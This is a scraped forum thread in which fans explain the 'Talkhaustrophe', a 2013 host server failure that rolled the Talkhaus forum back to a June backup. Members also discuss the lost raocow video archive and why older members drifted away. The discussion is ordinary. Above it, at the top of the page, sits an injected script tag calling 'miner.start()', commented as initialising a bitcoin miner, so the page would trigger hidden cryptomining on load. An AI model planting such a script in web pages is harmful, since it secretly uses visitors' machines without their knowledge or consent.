<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxypge projectsmw central

Why did the Talkhaustrophe happen?

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
TiKi
Posts: 27
Joined: 6 years ago

Why did the Talkhaustrophe happen?

Postby TiKi » 5 years ago

^

I don't get why, I just know it did.

Also: was Distorted Travesty's raocow thread lost in it?

User avatar
Unaniem
Desperately trying to figure out just what the hell
Posts: 156
Joined: 6 years ago
First name: Tree
Location: Megalovanilla

Re: Why did the Talkhaustrophe happen?

Postby Unaniem » 5 years ago

Zanyhost (previous server host of talkhaus) messed up their servers in October '13 and talkhaus was forced to use a backup (which was about 5 months old) of what was saved in data when the site came back up again under new management coming from Rena, rolling the forum back to July '13 and losing all posts made after that date.

The Distorted Travesty thread is here
Image

User avatar
ano0maly
Discord User
Posts: 2014
Joined: 8 years ago

Re: Why did the Talkhaustrophe happen?

Postby ano0maly » 5 years ago

It's more like to June 2nd or 3rd.
Image The talkhaus Discord server. Come ask for an invite to join!

Image

Image
Now the sole biggest

User avatar
Bean
Posts: 3151
Joined: 10 years ago
Location: In my own world

Re: Why did the Talkhaustrophe happen?

Postby Bean » 5 years ago

It was definitely June since any post for MM&B for me after when I took my break was gone. That break was from mid-May to mid-June. Luckily, Rena had a backup from around May 31st to June 2nd or so to make sure everything wasn't lost.

User avatar
ano0maly
Discord User
Posts: 2014
Joined: 8 years ago

Re: Why did the Talkhaustrophe happen?

Postby ano0maly » 5 years ago

It was Thissa who made a backup in June after TLs4 gave him site access.

Gosh get it right

Image The talkhaus Discord server. Come ask for an invite to join!

Image

Image
Now the sole biggest

User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1346
Joined: 6 years ago
First name: Matt
Location: Oregon

Re: Why did the Talkhaustrophe happen?

Postby YelseyKing » 5 years ago

It didn't just take out the Talkhaus, either. It killed everything.raocow.com, as well, which also had to be rolled back, and has yet to be fixed, so the last RPs archived there are incomplete playlists of Takkoman and MAGL2. Kind of a shame; I liked that archive, especially since raocow doesn't do playlists of his LPs, and it can be somewhat annoying to dig through the LP forum for old threads containing the links.

(Edit: Oh hey, post #888. Yay?)
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

User avatar
O'Largill
soggy
Posts: 0
Joined: 9 years ago
First name: iLeave
Location: zzz

Re: Why did the Talkhaustrophe happen?

Postby O'Largill » 5 years ago

tls4 put his did in the talkhaus server box and couldnt take it out until rena helped him

i really hope that didnt come off as too mean, goodness

Image
Image
i transformed into a half silkworm, half human anime girl, and caught you off guard. l-looks like... looks like you've been... tricked!!!

User avatar
Argumentable
the biggest shit
Posts: 535
Joined: 10 years ago
Location: Twitter
Contact:

Re: Why did the Talkhaustrophe happen?

Postby Argumentable » 5 years ago

i got bored

devil†zukin

Re: Why did the Talkhaustrophe happen?

Postby devil†zukin » 5 years ago

YelseyKing wrote:It didn't just take out the Talkhaus, either. It killed everything.raocow.com, as well, which also had to be rolled back, and has yet to be fixed, so the last RPs archived there are incomplete playlists of Takkoman and MAGL2. Kind of a shame; I liked that archive, especially since raocow doesn't do playlists of his LPs, and it can be somewhat annoying to dig through the LP forum for old threads containing the links.

(Edit: Oh hey, post #888. Yay?)
there's actually a new 1 that's community editable but ppl just said they used raolists

if ppl want to curate it I'll resurrect it

User avatar
ano0maly
Discord User
Posts: 2014
Joined: 8 years ago

Re: Why did the Talkhaustrophe happen?

Postby ano0maly » 5 years ago

Who is raolists I wonder
Image The talkhaus Discord server. Come ask for an invite to join!

Image

Image
Now the sole biggest

GlitchedGhost
Posts: 304
Joined: 7 years ago

Re: Why did the Talkhaustrophe happen?

Postby GlitchedGhost » 5 years ago

RenaBeach wrote:
YelseyKing wrote:It didn't just take out the Talkhaus, either. It killed everything.raocow.com, as well, which also had to be rolled back, and has yet to be fixed, so the last RPs archived there are incomplete playlists of Takkoman and MAGL2. Kind of a shame; I liked that archive, especially since raocow doesn't do playlists of his LPs, and it can be somewhat annoying to dig through the LP forum for old threads containing the links.

(Edit: Oh hey, post #888. Yay?)
there's actually a new 1 that's community editable but ppl just said they used raolists

if ppl want to curate it I'll resurrect it
I used it for watching rao's older videos. You should resurrect it, I'm sure others do as well.
He captured!
Image
raocow wrote:last night I had a dream where I finally understood what a 'birb' is, and turns out it's a collyflower
Image
Image
Image

devil†zukin

Re: Why did the Talkhaustrophe happen?

Postby devil†zukin » 5 years ago

GlitchedGhost wrote:
RenaBeach wrote:
YelseyKing wrote:It didn't just take out the Talkhaus, either. It killed everything.raocow.com, as well, which also had to be rolled back, and has yet to be fixed, so the last RPs archived there are incomplete playlists of Takkoman and MAGL2. Kind of a shame; I liked that archive, especially since raocow doesn't do playlists of his LPs, and it can be somewhat annoying to dig through the LP forum for old threads containing the links.

(Edit: Oh hey, post #888. Yay?)
there's actually a new 1 that's community editable but ppl just said they used raolists

if ppl want to curate it I'll resurrect it
I used it for watching rao's older videos. You should resurrect it, I'm sure others do as well.
it's still up here if you want to help categorise the videos -> http://everything.raocow.com:3000/ (although i could probably scrape raolist's playlists so don't spend too much time doing it)

the original is still here too for older videos -> http://everything.raocow.com/

User avatar
MonkeyShrapnel
Poke a Man
Posts: 375
Joined: 6 years ago
First name: Brian
Pronouns: he/him/his
Location: Canada Eh?
Contact:

Re: Why did the Talkhaustrophe happen?

Postby MonkeyShrapnel » 5 years ago

Man, if that one back-up hadn't been made...
Uh...Do I just sign here? What do you mean it should be obvious? There are people in this world...well...a whole lot of people that can't follow basic instructions!

Image
Image

My silly "Collab" Youtube channel https://www.youtube.com/user/Theguyswho ... s/featured
(That means I'm the only person using it nowadays.)

User avatar
FancyFancy
Posts: 59
Joined: 5 years ago

Re: Why did the Talkhaustrophe happen?

Postby FancyFancy » 5 years ago

Raolists is a godsend. Its gone dormant after episode 19 of a2xt tho'. :?:
FILMED IN
Image
ImageImage

devil†zukin

Re: Why did the Talkhaustrophe happen?

Postby devil†zukin » 5 years ago

FancyFancy wrote:Raolists is a godsend. Its gone dormant after episode 19 of a2xt tho'. :?:
dunno but -> http://everything.raocow.com/series

User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1346
Joined: 6 years ago
First name: Matt
Location: Oregon

Re: Why did the Talkhaustrophe happen?

Postby YelseyKing » 5 years ago

Just out of curiosity, did a lot of oldbies leave because of the Talkhaustrophe, or did they leave beforehand for other reasons? I've noticed a *lot* of older posts by people with 2000-5000 posts who I've... never seen post before. Kinda makes me sad that I missed so much of this place's history.
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

Bwarch
Local Candy Fiend
Posts: 143
Joined: 9 years ago
Pronouns: He/Him/His
Location: Scorpions and snakes aplenty oh my.

Re: Why did the Talkhaustrophe happen?

Postby Bwarch » 5 years ago

YelseyKing wrote:Just out of curiosity, did a lot of oldbies leave because of the Talkhaustrophe, or did they leave beforehand for other reasons? I've noticed a *lot* of older posts by people with 2000-5000 posts who I've... never seen post before. Kinda makes me sad that I missed so much of this place's history.
They probably left because of other reasons.

Rao was more or less shouting from the highest mountains in his videos keeping people updated, especially when talkhaus came back, so most everybody would have known. Peeps just lose interest mang, it happens.

User avatar
kilon
Posts: 2
Joined: 10 years ago
Location: Netherlands

Re: Why did the Talkhaustrophe happen?

Postby kilon » 5 years ago

YelseyKing wrote:Just out of curiosity, did a lot of oldbies leave because of the Talkhaustrophe, or did they leave beforehand for other reasons? I've noticed a *lot* of older posts by people with 2000-5000 posts who I've... never seen post before. Kinda makes me sad that I missed so much of this place's history.
Personally for me it's a combination of:
-No interest in raocow
-No interest in what happens on the forum (the oldies are all cool though. And 2009-2011 this forum was the best)
-Personal stuff
-Life

And that goes for most users that stopped posting.
I still check the forum though, and every now and then see what is happening.
Image
Image
Image

User avatar
The Destroyer of Worlds
I am become death
Posts: 1487
Joined: 7 years ago

Re: Why did the Talkhaustrophe happen?

Postby The Destroyer of Worlds » 5 years ago

TiKi wrote:^

I don't get why, I just know it did.

Also: was Distorted Travesty's raocow thread lost in it?
Because you looked at those pictures late at night.
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!


Return to “the gazebo”

Who is online

Users browsing this forum: No registered users and 1 guest